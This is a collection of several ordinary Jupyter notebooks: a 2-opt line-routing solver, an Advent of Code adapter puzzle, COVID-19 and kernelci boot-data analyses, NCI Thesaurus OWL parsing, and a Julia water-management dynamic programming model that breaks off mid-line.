# Once a permutation is calculated from the point-wise representation, the resulting route may be invalid. Invalid routes occur when, for example, a line-segment's two points are no longer adjacent to each other. Our method `generate_valid_route` will produce a valid step-wise route given the new permutation in the point-wise representation.
#
# The step-wise representation of the route is passed to `routeDistance()` to return the length of that candidate route.
#
# The process of systematically permuting the route and testing its length against our best length is continued until the desired improvement threshold is reached.
#
# >NOTE: Our solution below contains some debugging print statements that can be removed in a final solution.

# +
# Calculate the euclidian distance in n-space of the route r traversing cities c, ending at the path start.
#path_distance = lambda r,c: np.sum([np.linalg.norm(c[r[p]]-c[r[p-1]]) for p in range(len(r))])

# Reverse the order of all elements from element i to element k in array r.
two_opt_swap = lambda r,i,k: np.concatenate((r[0:i],r[k:-len(r)+i-1:-1],r[k+1:len(r)]))

def two_opt_lines(xs,ys,improvement_threshold): # 2-opt Algorithm adapted from https://en.wikipedia.org/wiki/2-opt
    # Pre-compute the step-distance table for the lines defined by xs/ys.
    dd = generate_distance_table_for_lines(xs,ys)

    # Generate a candidate route from the individual points.
    point_route = np.arange(len(xs))
    # Make sure the route is valid, in part, by dropping implied points.
    route = generate_valid_route(point_route)

    improvement_factor = 1 # Initialize the improvement factor.
    best_distance = routeDistance(route,dd)
    print(route)
    print("Initial Distance: %0.2f" % best_distance)

    # Begin the search.
    while improvement_factor > improvement_threshold: # If the route is still improving, keep going!
        distance_to_beat = best_distance # Record the distance at the beginning of the loop.
        for swap_first in range(1,len(point_route)-2): # From each point except the first and last,
            for swap_last in range(swap_first+1,len(point_route)-1): # to each of the points following,
                # try reversing the order of these points.
                # Note, when two indices are non-sequential, this will reverse the
                # order of the lines. When two indices are sequential, it will reverse
                # the direction of the line.
                new_candidate_point_route = two_opt_swap(point_route,swap_first,swap_last)

                # Our candidate route will likely not be valid. It will specify a point at the
                # end of one line without specifying its pair at the other end of the line next.
                # generate_valid_route will enforce this.
                # NOTE: This step may be controversial, because in dropping invalid points
                # I may be making some permutations unattainable. It may be impossible to "swap"
                # my way to some portions of the search area. Need to think about this more.
                new_route = generate_valid_route(new_candidate_point_route)

                # generate_valid_route will return a condensed route, only specifying the start
                # of each line to traverse. This is used in our function to calculate the route
                # length. But subsequent permutations require the full list of points to traverse,
                # which is provided from the condensed route by route_by_points.
                new_point_route = route_by_points(new_route)

                # and check the total distance with this modification.
                new_distance = routeDistance(new_route,dd)
                print("new route %0.2f:" % new_distance)
                print(new_route)

                if new_distance < best_distance: # If the path distance is an improvement,
                    point_route = new_point_route # make this the accepted best route
                    best_distance = new_distance # and update the distance corresponding to this route.
                    print("New best route: %0.2f" % new_distance)
                    print(new_route)

        improvement_factor = 1 - best_distance/distance_to_beat # Calculate how much the route has improved.
        print("Dist: %0.3f, improvement factor: %0.3f" % (best_distance,improvement_factor))
        print(new_route)

    route = generate_valid_route(point_route)
    return route # When the route is no longer improving substantially, stop searching and return the route.
# -

# Now let's test our solution. We'll generate 20 random points. The first point will be our starting point, and our final point will be our ending point, and the 18 points will designate 9 lines that we are to traverse, in any order.

# +
np.random.seed(13)
x = np.random.random((20,1))*100
y = np.random.random((20,1))*100

plt.figure()
plot_lines(x,y)
# -

ii = two_opt_lines(x,y,.01)

# Before we inspect our result, let's look at the output above and see what's happening. The first route consists of the odd indices from our list of input points, which means we are to traverse the lines in the order they were specified, and because all indices are odd, all lines are to be traversed in the forward direction.
#
#     [0, 1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
#     Initial Distance: 1239.41
#
# This is our new route after the first permutation and its length, which is worse than our initial route, so it is not retained. The index at location 1 has switched from "1" to "2". This means the route is identical to the previous one, but the first line is traversed in the backward direction:
#
#     new route 1251.16:
#     [0, 2, 3, 5, 7, 9, 11, 13, 15, 17, 19]
#
# The next route does improve on our initial route. The indexes at locations 1 and 2 ("3" and "2" respectively) have been swapped. Now the second line segment is being traversed prior to the first line segment and, as before, the first line segment is being traversed backward.
# This new route is identified as a new best route and we print it out again for emphasis:
#
#     new route 1112.86:
#     [0, 3, 2, 5, 7, 9, 11, 13, 15, 17, 19]
#     New best route: 1112.86
#     [0, 3, 2, 5, 7, 9, 11, 13, 15, 17, 19]
#
# The process of permuting the route continues until the improvement threshold drops below the specified value.
#
# Let's now plot up the most optimal route we've found thus far.

# Expand the condensed (step-wise) route into the full point-wise route for plotting.
iii = route_by_points(ii)

plt.figure()
plot_route(iii,x,y)
plot_lines(x,y)

# Display the condensed route (line start indices only).
ii

# Display the full point-wise route.
iii
TSP_Testing.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Day 10 - Sorting adapters
#
# * https://adventofcode.com/2020/day/10
#
# <NAME> is trying to trick us again with a convoluted description; all we have to do is *sort* the adapters. That's because, to be able to use all adapters, we can only put any given adapter between adapters that are lower on the one end, and higher on the other.
#
# Once sorted, we can keep a count of their differences; a `Counter()` can do that just fine.
#
# To keep track of the preceding adapter (to calculate the jolt differential), I used the `pairwise` recipe from the [`itertools` recipes section](https://docs.python.org/3/library/itertools.html#itertools-recipes); that's a fixed window iterator, really.

# +
from collections import Counter
from collections.abc import Sequence
from itertools import chain, tee


def pairwise(iterable):
    "s -> (s0,s1), (s1,s2), (s2, s3), ..."
    first, second = tee(iterable)
    next(second, None)  # advance the trailing copy by one element
    return zip(first, second)


def parse_adapters(input_: str) -> Sequence[int]:
    """Parse whitespace-separated jolt ratings into a list of ints."""
    return list(map(int, input_.split()))


def all_adapters(adapters: Sequence[int]) -> int:
    """Chain every adapter from the outlet (jolt 0) and multiply the
    count of 1-jolt steps by the count of 3-jolt steps."""
    ordered = sorted(adapters)
    # Pair each adapter with its predecessor, starting from the outlet at 0.
    steps = pairwise(chain([0], ordered))
    differences = Counter(after - before for before, after in steps)
    # The built-in device is always a +3 step above the highest adapter.
    return differences[1] * (differences[3] + 1)


tests = {
    "16 10 15 5 1 11 7 19 6 12 4": 7 * 5,
    (
        "28 33 18 42 31 14 46 20 48 47 24 23 49 45 "
        "19 38 39 11 1 32 25 35 8 17 7 9 4 2 34 10 3"
    ): 22 * 10,
}
for puzzle, want in tests.items():
    assert all_adapters(parse_adapters(puzzle)) == want
# -

import aocd

adapters = parse_adapters(aocd.get_data(day=10, year=2020))
print("Part 1:", all_adapters(adapters))

# ## Part 2 - Calculating the number of combinations.
#
# Finally, we are entering more advanced territories in this year's AoC.
# To calculate the number of combinations, there are two approaches we can take:
#
# - Recursion: the number of combinations of a given adapter with jolt level *J* is the sum of all adapters with jolt levels *J + 1*, *J + 2* and *J + 3* that exist. Eventually you'll reach the last adapter (your device), so you reach the base case with a value of `1`. You'd be smart to use memoization there, as those *J + 2* and *J + 3* adapters are often also reachable from the *J + 1* and *J + 2* positions; you wouldn't want to have to calculate those numbers again!
#
#   The disadvantage here is that we need, even with memoization, `len(adapters)` spaces in our cache to reach the end and so finally sum up the total number of combinations. And while you could unroll the recursion and use an explicit stack instead of the call stack to track your progress, that's still a lot of work.
#
# - Inverting the calculation, and using *dynamic programming*. If the number of combinations for an adapter of jolt level *J* depends on the values for the adapters at *J + 1*, *J + 2* and *J + 3*, could we first calculate the number of combinations for the *last* 3 adapters in the chain, and work our way back from there? That way we would only need enough memory to remember the number of combinations of 3 adapters, at most, throughout!
#
# Note that the puzzle explicitly tells us that the last element, your device, is *always* at *J + 3* from the adapter before it. So the _base case_ here is that for the one-but-last adapter the number of combinations is never more than 1 *either* (it can only connect directly to your device), and for the adapter at the second-last position there is *also* just one option: you can't skip the one-but-last adapter.
# # To implement the latter option, I chose a `deque` to represent the number of combinations you can make with adapters (if they exist), at jolt levels `+1`, `+2` and `+3`, and then just prepend the value for our adapter to that point, and rotate in zeros to the start depending on how many jolt levels need to be skipped to reach the next last adapter. Because the `deque` is configured to only hold 3 values, rotating in zeros neatly drops off values from the end as adapters at higher jolt levels disappear from consideration: # + from collections import deque def calc_combinations(adapters: Sequence[int]) -> int: # start with [1], and max() + 3, to represent the device at the end combos = deque([1], maxlen=3) next_ = max(adapters) + 3 # (device, adapters[-1]), (adapters[-1], adapters[-2]), ... with_next = pairwise(chain([next_], sorted(adapters, reverse=True))) for next_, adapter in with_next: combos.extendleft([0] * (next_ - adapter - 1)) # automatically drops values on the opposite end combos.appendleft(sum(combos)) # add up all combinations of adapters we can reach return sum(combos) tests = { "16 10 15 5 1 11 7 19 6 12 4": 8, ( "28 33 18 42 31 14 46 20 48 47 24 23 49 45 " "19 38 39 11 1 32 25 35 8 17 7 9 4 2 34 10 3" ): 19208, } for test, expected in tests.items(): assert calc_combinations(parse_adapters(test)) == expected # - print("Part 2:", calc_combinations(adapters))
2020/Day 10.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3.6.9 64-bit
#     name: python36964bitf5b195da2cdf45ecac6606a5567484dd
# ---

import pandas as pd

pd.options.display.max_columns = 50

# Fetch the published Google Sheet with per-case COVID-19 records.
df_html = pd.read_html('https://docs.google.com/spreadsheets/d/e/2PACX-1vQU0SIALScXx8VXDX7yKNKWWPKE1YjFlWc6VTEVSN45CklWWf-uWmprQIyLtoPDA18tX9cFDr-aQ9S6/pubhtml#')

# pd.read_html returns a list of dataframes; the first one holds the data.
df2 = df_html[0]
# The first three rows are sheet chrome/headers, not data.
df2.drop([0, 1, 2],inplace= True)
df2.reset_index(inplace = True) #Resetting index

# Target column names, in sheet order.
col = ['reporting_date', 'summary', 'location', 'country', 'gender', 'age', 'symptom_onset',
       'If_onset_approximated', 'hosp_visit_date', 'international_traveler', 'domestic_traveler', 'exposure_start',
       'exposure_end', 'traveler', 'visiting_Wuhan', 'from_Wuhan', 'death', 'recovered', 'symptom', 'source','link']
# Drop the sheet's empty/auto-generated columns before renaming.
df2.drop(columns=['index', 'Unnamed: 0', 'Unnamed: 1', 'Unnamed: 2', 'Unnamed: 4', 'Unnamed: 25',
                  'Unnamed: 26', 'Unnamed: 27', 'Unnamed: 28', 'Unnamed: 29', 'Unnamed: 30'], inplace= True)
df2.columns = col

# NOTE(review): '|' in the filename is invalid on Windows; consider '-' instead.
df2.to_csv('covid-19_03|11|20.csv', index= False)

df = pd.read_csv('covid-19_03|11|20.csv')

df.head()

df.shape

# Percentage of missing values per column.
(df.isnull().sum()/len(df))*100

def unique(df):
    """Print the number of distinct values in each column."""
    # Loop variable renamed from `col` to avoid shadowing the module-level
    # `col` list of column names.
    for name in df.columns:
        print(name + ':' , len(df[name].value_counts()))
unique(df)

def new_death_col(row):
    """Extract a death date from the 'death' column of one row.

    'death' holds '0' (alive), '1' (died, date unknown) or a date string.
    Returns the date string when present, otherwise '0'.
    """
    # FIX: was positional `col[16]` on a labeled row Series (and the
    # parameter shadowed the module-level `col` list); positional integer
    # indexing on a labeled Series is deprecated/fragile in pandas —
    # use the column label instead.
    value = row['death']
    if (value != '0' and value != '1'):
        return value
    else:
        return '0'
# NOTE(review): this applies to df2 (pre-CSV-round-trip) but assigns into df;
# the two frames hold the same rows here, but using one frame throughout
# would be safer.
df['death_date'] = df2.apply(new_death_col,axis = 1)

df[df['death'] != '0']

df['death_date'].value_counts()
data_exploration.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 2
#     language: python
#     name: python2
# ---

# +
#Objective: If something was passing in mainline.. but failing in 'next', want to catch those commits causing regressions.
#Note: Not dealing with situations where we don't have data for last 2 days.
# -

import pandas as pd
import json
from pandas.io.json import json_normalize
import matplotlib.pyplot as plt
import datetime
# %matplotlib inline

#Input Parameters
job1 = 'mainline'
job2 = 'next'
date_range = 10
threshold = 0.01
last_days=2

# +
import requests
from urlparse import urljoin

import kernelci_api_key

BACKEND_URL = "http://api.kernelci.org"

def invoke(job_name, date_range_loc):
    """GET /boot from the kernelci backend for one job over a date range;
    returns the raw JSON response body."""
    headers = {"Authorization":kernelci_api_key.getkernelcikey()}
    params = {
        "job": job_name,
        "date_range": date_range_loc
    }
    url = urljoin(BACKEND_URL, "/boot")
    response = requests.get(url, params=params, headers=headers)
    return response.content

def getDfBoots(job_name, date_range_loc):
    """Fetch boot results for a job and summarize pass rates.

    Returns (per-boot frame indexed by created_on,
             per-(defconfig, board) summary joining the whole range ('_L')
             with the last `last_days` days ('_S')).
    """
    content = invoke(job_name, date_range_loc)
    contentjs = json.loads(content)
    df = json_normalize(contentjs['result'])

    #Select only columns we care about for boot pass/fail analysis
    df2 = df[['_id.$oid',u'arch',u'board',u'board_instance',
              u'created_on.$date',u'defconfig',u'dtb',
              u'git_describe',u'lab_name',u'mach',u'status']]

    #convert created_on to datetime and use as index
    df2['created_on'] = pd.to_datetime(df2['created_on.$date'],unit='ms')
    df2 = df2.set_index('created_on')
    df2 = df2.drop('created_on.$date',axis=1)

    #Consider only Pass and Fail; encode PASS=1/FAIL=0 so mean() is a pass rate.
    df2 = df2[df2.status.isin(['PASS','FAIL'])]
    df2['status_fl'] = df2.status.map({'PASS':1,'FAIL':0})

    #Sort index of dates
    df2 = df2.sort_index()
    del df

    #Find Boot pass percentage and number of boots for all days
    df3 = df2.groupby(['defconfig','board']).mean()
    df3.columns = [job_name+'_st_L']
    df3[job_name+'_c_L'] = df2.groupby(['defconfig','board']).count().status_fl

    #Find Boot pass percentage and number of boots for last 'last_days' days
    df4 = df2[(df2.index[-1] - datetime.timedelta(last_days)):df2.index[-1]].groupby(['defconfig','board']).mean()
    df4.columns = [job_name+'_st_S']
    df4[job_name+'_c_S'] = df2[(df2.index[-1] - datetime.timedelta(last_days)):df2.index[-1]].groupby(['defconfig','board']).count().status_fl

    return (df2,df3.join(df4,how='inner'))
# -

# +
#Plot two overlapping defconfig-board with interaction
from bokeh.plotting import figure, output_file, output_notebook,show, GridPlot
from bokeh.models import ColumnDataSource, Circle, HoverTool,CustomJS

def retSimpleLists(df, defconfig, board, name):
    """Return (timestamps, pass/fail flags, git_describe, date strings,
    repeated series name) for one defconfig/board combo."""
    df2 = df[(df.defconfig == defconfig) & (df.board == board)]
    (x,y,k) = (df2.index.to_series(), df2['status_fl'],df2['git_describe'])
    ts = pd.to_datetime(x.values)
    z = ts.strftime('%Y.%m.%d')
    n = []
    for i in range(0,len(x)):
        n.append(name)
    return (x,y,k,z,n)

def retInteractiveFig(x,y,k,z,color,title):
    """Build a bokeh figure with a dashed line plus hover-highlighted circles."""
    p = figure(width=600,height=300,x_axis_type='datetime', title=title)
    p.line(x,y,line_dash="4 4", line_width=2,color=color)

    source = ColumnDataSource({'x':x,'y':y,'z':z,'k':k})
    invisible_circle = Circle(x='x',y='y', fill_color=color, fill_alpha=0.1, line_color=None, size=10)
    visible_circle = Circle(x='x',y='y', fill_color='firebrick', fill_alpha=0.5, line_color=None, size=10)
    cr = p.add_glyph(source, invisible_circle, selection_glyph=visible_circle, nonselection_glyph=invisible_circle)

    # Add a hover tool that selects the circle under the cursor.
    code = "source.set('selected', cb_data['index']);"
    callback = CustomJS(args={'source': source}, code=code)
    p.add_tools(HoverTool(
        tooltips=[
            ("d", "@z"),
            ("stat", "@y"),
            ('gd', "@k")
        ], callback=callback, renderers=[cr], mode='vline'))
    return p

def draw_interactive_2(df1, df2, defconfig, board):
    """Show mainline and next pass/fail history for one defconfig/board."""
    #Reduce data to given defconfig-board combo
    x1,y1,k1,z1,n1 = retSimpleLists(df1, defconfig, board,'mainline')
    x2,y2,k2,z2,n2 = retSimpleLists(df2, defconfig, board,'next')

    output_notebook()

    #draw line,circles for df1 (Eg: mainline)
    p1 = retInteractiveFig(x1,y1,k1,z1,'blue','mainline')
    p2 = retInteractiveFig(x2,y2,k2,z2,'red','next')
    show(p1)
    show(p2)
    #gp = GridPlot(children=[p1,p2])
    #show(gp)
# -

df_mainline,df_mainline_sum = getDfBoots('mainline', date_range)

df_next,df_next_sum = getDfBoots('next', date_range)

df = df_mainline_sum.join(df_next_sum, how='inner')[['mainline_st_S','next_st_S']]

# Combos where mainline's recent pass rate beats next's by more than threshold
# — candidate regressions introduced in next.
df[(df.mainline_st_S - df.next_st_S) > threshold]

draw_interactive_2(df_mainline,df_next,'multi_v7_defconfig', 'qcom-msm8974-sony-xperia-honami')

defconfig = 'multi_v7_defconfig'
board = 'qcom-msm8974-sony-xperia-honami'
x1,y1,k1,z1,n1 = retSimpleLists(df_mainline, defconfig, board, 'mainline')
x2,y2,k2,z2,n2 = retSimpleLists(df_next, defconfig, board, 'next')

# +
#Plot above with interaction
from bokeh.plotting import figure, output_file, output_notebook,show
from bokeh.models import ColumnDataSource, Circle, Triangle, HoverTool,CustomJS,BoxSelectTool

p = figure(width=600,height=300,x_axis_type='datetime', title='Vish')
#p.line(x1,y1,line_dash="4 4", line_width=2,color='blue')
p.line(x2,y2,line_dash="4 4", line_width=2,color='green')

source1 = ColumnDataSource({'x1':x1,'y1':y1,'z1':z1,'k1':k1,'n1':n1})
# FIX: 'x2' was fed x1 (mainline timestamps) — the next-series circles were
# plotted against the wrong x values (and would break if the two series had
# different lengths). Use x2.
source2 = ColumnDataSource({'x2':x2,'y2':y2,'z2':z2,'k2':k2,'n2':n2})

mainline_glyph = Circle(x='x1',y='y1', fill_color='blue',fill_alpha=0.3,line_color=None, size=10)
next_glyph = Circle(x='x2',y='y2', fill_color='green',fill_alpha=0.3,line_color=None, size=10)
mainline_a = p.add_glyph(source1, mainline_glyph)
next_a = p.add_glyph(source2, next_glyph)

code = "source.set('selected', cb_data['index']);"
# FIX: the args key was 'source1', but the JS snippet references `source`,
# so the callback's variable was never bound (matches the working pattern
# in retInteractiveFig above).
callback = CustomJS(args={'source': source1}, code=code)
mainline_ht = HoverTool(
    tooltips=[("n", "@n1"),("d", "@z1"),("stat", "@y1"),('gd', "@k1")],
    callback=callback, renderers=[mainline_a], mode='vline')

code2 = "source.set('selected', cb_data['index']);"
callback2 = CustomJS(args={'source': source2}, code=code2)
next_ht = HoverTool(
    tooltips=[("n", "@n2"),("d", "@z2"),("stat", "@y2"),('gd', "@k2")],
    callback=callback2, renderers=[next_a], mode='vline')

p.add_tools(mainline_ht, next_ht)

show(p)
# -
tinker/Catch_Culprit_Commits_Heading_to_Mainline.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: obo-owl
#     language: python
#     name: obo-owl
# ---

# +
import time

import rdflib


class NciThesaurusTools(object):
    """A class to provide a toolkit for working with OWL files from NCI Thesaurus."""

    @staticmethod
    def _parse_owl(inputfile: str) -> rdflib.Graph:
        """
        Summary:
        --------
        A semantically related method to the class, to be used as a
        reproducible means to parse an OWL to XML.

        Parameters:
        -----------
        inputfile : str.
            Path to the NCI Thesaurus OWL file that is to be parsed.

        Returns:
        --------
        graph : rdflib.Graph.
            A live RDF graph instance of the NCI Thesaurus's release.
        """
        try:
            start_time = time.time()
            graph = rdflib.Graph()
            print("Begin to parse OWL inputfile...")
            # Need to bind prefix --> if not, serializations end up with a
            # blank prefix for the NCIt namespace
            graph.namespace_manager.bind(
                "ncit", "http://ncicb.nci.nih.gov/xml/owl/EVS/Thesaurus.owl#"
            )
            graph.parse(inputfile, format="xml")  # format='xml' is default
            end_time = time.time()
            print(
                "Successfully completed parsing OWL in: {} ".format(
                    end_time - start_time
                )
            )
        except Exception:
            # Fixed: was `raise Exception(e)`, which discarded the original
            # exception type and traceback; a bare raise re-raises unchanged.
            raise
        return graph
# -

# Parse OWL file (NCI Thesaurus latest release -> Thesaurus.owl) to RDF/XML
parser = NciThesaurusTools()
g = parser._parse_owl(inputfile="./input_data/Thesaurus.owl")

len(g)

# +
# # %%time
# # Output a turtle serialization of the live RDF graph instance to same
# # directory as input OWL. This can take ~10 minutes
# g.serialize(
#     destination="./output_data/ncit_serialized.ttl",
#     format="ttl",
#     encoding='utf-8'
# )

# +
# # %%time
# # Serialization to JSON-LD is supported & can be done as follows:
# g.serialize(destination='./output_data/ncit_serialized_jsonld.jsonld',
#             format='json-ld',
#             indent=2)

# +
from pprint import pprint

import pandas as pd

pd.set_option("display.max_rows", 999)
pd.set_option("display.max_colwidth", None)

# +
# Namespaces & Prefixes bound in the graph
df = pd.DataFrame(
    data=g.namespace_manager.namespaces(), columns=["prefix", "namespace"]
).sort_values(by=["prefix"])
df

# for namespace in g.namespaces():
#     print(namespace)

# +
from pprint import pprint

test_sparql = """SELECT DISTINCT ?s ?p ?o
WHERE {
    ?s rdf:type owl:Class .
    ?s ?p ?o .
}
LIMIT 20"""

result = g.query(test_sparql)

for x in result:
    pprint(x)

# Fixed: was `data=x`, which built the frame from only the *last* row of
# the loop above; use the full result set instead.
df = pd.DataFrame(data=result, columns=["s", "p", "o"]).drop_duplicates()
df

# +
# Build a function to print x amount of triples (limit(x) = 5)
def printtriples(graph, limit):
    """Pretty-print up to `limit` (s, p, o) triples; return the last one."""
    n = 0
    for trip in graph:
        pprint(trip)
        print("\r")
        n = n + 1
        if n >= limit:
            break
    return trip


printtriples(graph=g, limit=5)

# +
# Renamed from a second `printtriples` definition, which silently shadowed
# the one above; this variant prints each triple component on its own line.
def printtriples_parts(graph, limit):
    """Pretty-print subject, predicate, object of up to `limit` triples
    (limit <= 0 means no limit); return the last triple's components."""
    n = 0
    for subj, pred, obj in graph:
        pprint(subj)
        pprint(pred)
        pprint(obj)
        print("\n\n")
        if limit > 0:
            n = n + 1
            if n == limit:
                break
    return subj, pred, obj


printtriples_parts(graph=g, limit=3)

# +
# SPARQL query to collect all predicates used on owl:Class subjects
predicates = """SELECT DISTINCT ?p
WHERE {
    ?s rdf:type owl:Class .
    ?s ?p ?o .
}
LIMIT 100"""

# Run the query predicates, and save the results in variable result
result = g.query(predicates)

# Print all results
# for row in result:
#     pprint(row[0])

df = pd.DataFrame(data=result, columns=["p"]).drop_duplicates()
df.sort_values("p")

# +
# Find p & o where conceptUri = 'C62554' -> Parp Inhibitor
conceptUri = "ncit:C62554"

parp = f"""SELECT DISTINCT ?p ?o
WHERE {{
    {conceptUri} rdf:type owl:Class .
    {conceptUri} ?p ?o .
}}
LIMIT 150"""

# Run the query q1, and save the results in variable r1
result = g.query(parp)

# Print the results
# for x in result:
#     print(x[0], "\n")

df = pd.DataFrame(data=result, columns=["p", "o"]).drop_duplicates()
df.head(20)
# -
parse_ncit_owl.ipynb
# -*- coding: utf-8 -*- # --- # jupyter: # jupytext: # text_representation: # extension: .jl # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Julia 0.6.0 # language: julia # name: julia-0.6 # --- # # 9.7.4 Water Management # # From <NAME> Fackler, Applied Computational Economics and Finance, 2002, Section 9.7.4 # 貯水池の水を灌漑用水とレクリエーションに使うことができる。年初に $s$ 単位の水が貯水池にあって、灌漑に $x$ 単位使われたとき、農家とレクリエーション使用者のその年の利益はそれぞれ $F(x)$ と $U(s-x)$ になる。貯水池の水は冬季にランダムに $\epsilon$ 単位降る雨によって補充される。貯水池は最大 $M$ 単位の水しか貯められない。 # このモデルは an infinite horizon ,stochastic model である。 # # The state variable: $s \in [0, M]$ …年初の貯水池の水量。 # # The action variable: $x \in [0, s]$ …灌漑に使われる水量。 # # The state transition function: $g(s, x, \epsilon) = min(s - x + \epsilon, M)$ # # The reward function: $f(s, x) = F(x) + U(s - x)$ # # 年初に $s$ 単位の水がある貯水池の社会的価値がベルマン方程式を満たす。 # # $V(s) = \max_{0 \leq x \leq s}\{F(x) + U(s - x) + \delta E_\epsilon V (min(s - x + \epsilon, M)\}$ # $F'(0), U'(0), M$ が十分に大きいと仮定すると、最適解において制約が束縛されないので、水の潜在価格 $\lambda(s)$ はオイラーの平衡条件を満たす。 # # $F'(x) - U'(s - x) - \delta E_\epsilon \lambda (s - x + \epsilon) = 0$ # # $\lambda(s) = U'(s - x) + \delta E_\epsilon \lambda (s - x + \epsilon)$ # # このことは最適経路の周辺で $F'_t = U'_t + \delta E_t \lambda_{t + 1}$ が成立することを示す。 # 確実性等価での安定状態での貯水池の水量 $s^*$ 、灌漑に用いる水量 $x^*$ 、潜在価格 $\lambda^*$ で方程式を解くと、 # # $x^* = \bar{\epsilon}$ # # $F'(x^*) = \lambda^*$ # # $U'(s^* - x^*) = (1 - \delta)F'(x^*)$ # # ここで $\bar{\epsilon}$ は年間の平均降水量である。この条件は $x^*$ と $\lambda^*$ は割引因子の影響を受けず、 $s^*$ は割引因子の影響を受けることを示す。 using QuantEcon using BasisMatrices using Optim using Plots struct WaterManagement a1::Float64 a2::Float64 b1::Float64 b2::Float64 sigma::Float64 delta::Float64 s_vec::Vector{Float64} end n = 10 smin = 2 smax = 7 fspace = Basis(ChebParams(n, smin, smax)) snodes = nodes(fspace) WM =WaterManagement(1, 2, -2, -3, 0.2, 0.9, snodes[1]) # ### 一次線形補間 a1, a2, b1, b2, sigma, delta = WM.a1, WM.a2, WM.b1, WM.b2, WM.sigma, WM.delta nshocks 
= 3 epsilon, weight = qnwlogn(nshocks, - WM.sigma^2/2, WM.sigma^2) # + function update_Bellman1(WM::WaterManagement, V::Vector) a1, a2, b1, b2, sigma, delta = WM.a1, WM.a2, WM.b1, WM.b2, WM.sigma, WM.delta V_new = similar(V) x_opt = similar(V) V_func = LinInterp(WM.s_vec, V) for (s_idx, s) in enumerate(WM.s_vec) objective(x) = -(a1/(1+b1) * x^(1+b1) + a2/(1+b2) * (s-x)^(1+b2) + delta * dot(weight ,V_func.(s-x+epsilon))) opt = optimize(objective, 1e-10, s) V_new[s_idx] = - opt.minimum x_opt[s_idx] = opt.minimizer end return V_new, x_opt end # - # Initial guess V = zeros(length(WM.s_vec)); # + V_computed = similar(V) x_opt = similar(V) resid1 = Vector{Float64}(n) tol = sqrt(eps()) max_iter = 500 V_error = 1.0 i = 1 while V_error > tol && i <= max_iter V_computed, x_opt = update_Bellman1(WM, V) V_error = maximum(abs, V_computed - V) for j in 1:length(V_computed) resid1[j] = V_computed[j] - V[j] end copy!(V, V_computed) i += 1 end # - plot(WM.s_vec, x_opt, xlabel="Water Level", ylabel="Irrigation", xlim=(2, 7), ylim=(0.6, 1.6)) # ### Chebychev Collocation n = 10 s_min = 2 s_max = 7 basis = Basis(ChebParams(n, s_min, s_max)) S, _ = nodes(basis) Phi = BasisMatrix(basis, Expanded(), S).vals[1] # + function update_Bellman2(WM::WaterManagement, C::Vector) a1, a2, b1, b2, sigma, delta = WM.a1, WM.a2, WM.b1, WM.b2, WM.sigma, WM.delta V_new = similar(C) x_opt = similar(C) for (s_idx, s) in enumerate(S) objective(x) = -(a1/(1+b1) * x^(1+b1) + a2/(1+b2) * (s-x)^(1+b2) + delta * dot(weight, funeval(C, basis, s - x + epsilon))) opt = optimize(objective, 0, s) V_new[s_idx] = - opt.minimum x_opt[s_idx] = opt.minimizer end C_new = Phi \ V_new return C_new, x_opt end # - C = zeros(n); # + C_computed = similar(C) x_opt = similar(C) tol = sqrt(eps()) max_iter = 500 C_error = 1.0 i = 1 while C_error > tol && i <= max_iter C_computed, x_opt = update_Bellman2(WM, C) C_error = maximum(abs, C_computed - C) copy!(C, C_computed) i += 1 end # - i, C_error, x_opt ss = linspace(s_min, s_max, 50) 
x_opt = Array{Float64}(length(ss)) for (s_idx, s) in enumerate(ss) objective(x) = -(a1/(1+b1) * x^(1+b1) + a2/(1+b2) * (s-x)^(1+b2) + delta * dot(weight ,funeval(C, basis, s - x + epsilon))) opt = optimize(objective, 0, s) x_opt[s_idx] = opt.minimizer end B1 = evalbase(basis.params[1], ss, 1) cheb_shadow_prices = B1 * C; # ### Linear Quadratic approximation function approx_lq(s_star, x_star, f_star, Df_star, DDf_star, g_star, Dg_star, discount) n = 2 # Dim of state variable (1, s) k = 1 # Dim of control variable x sx_star = [s_star, x_star] # (1, s)' R (1, s) + 2 x N (1, s) + x Q x Q = Array{Float64}(k, k) R = Array{Float64}(n, n) N = Array{Float64}(k, n) R[1, 1] = -(f_star - Df_star' * sx_star + (sx_star' * DDf_star * sx_star) / 2) R[2, 2], N[1, 2], N[1, 2], Q[1, 1] = -DDf_star / 2 R[2, 1], N[1, 1] = -(Df_star - DDf_star * sx_star) / 2 R[1, 2] = R[2, 1] # A (1, s) + B x + C w A = Array{Float64}(n, n) B = Array{Float64}(n, k) C = zeros(n, 1) A[1, 1], A[1, 2], B[1, 1] = 1, 0, 0 A[2, 1] = g_star - Dg_star' * sx_star A[2, 2], B[2, 1] = Dg_star lq = LQ(Q, R, A, B, C, N, bet=discount) return lq end estar = exp(-sigma^2/2) # + f(s, x) = a1 * x^(1+b1)/(1 + b1) + a2 * (s - x)^(1 + b2)/(1 + b2) f_s(s, x) = a2 * (s - x)^b2 f_x(s, x) = a1 * x^b1 - a2 * (s - x)^b2 f_ss(s, x) = a2 * b2 * (s - x)^(b2 - 1) f_sx(s, x) = -a2 * b2 * (s - x)^(b2 - 1) f_xx(s, x) = a1 * b1 * x^(b1 - 1) + a2 * b2 * (s - x)^(b2 - 1) g(s, x) = s - x + estar g_s(s, x) = 1 g_x(s, x) = -1; # - x_star = 1 s_star = 1 + (a1 * (1 - delta)/a2)^(1/b2) s_star, x_star f_x(s_star, x_star) + delta * f_s(g(s_star, x_star), x_star) * g_x(s_star, x_star) f_star = f(s_star, x_star) Df_star = [f_s(s_star, x_star), f_x(s_star, x_star)] DDf_star = [f_ss(s_star, x_star) f_sx(s_star, x_star); f_sx(s_star, x_star) f_xx(s_star, x_star)] g_star = g(s_star, x_star) Dg_star = [g_s(s_star, x_star), g_x(s_star, x_star)]; lq = approx_lq(s_star, x_star, f_star, Df_star, 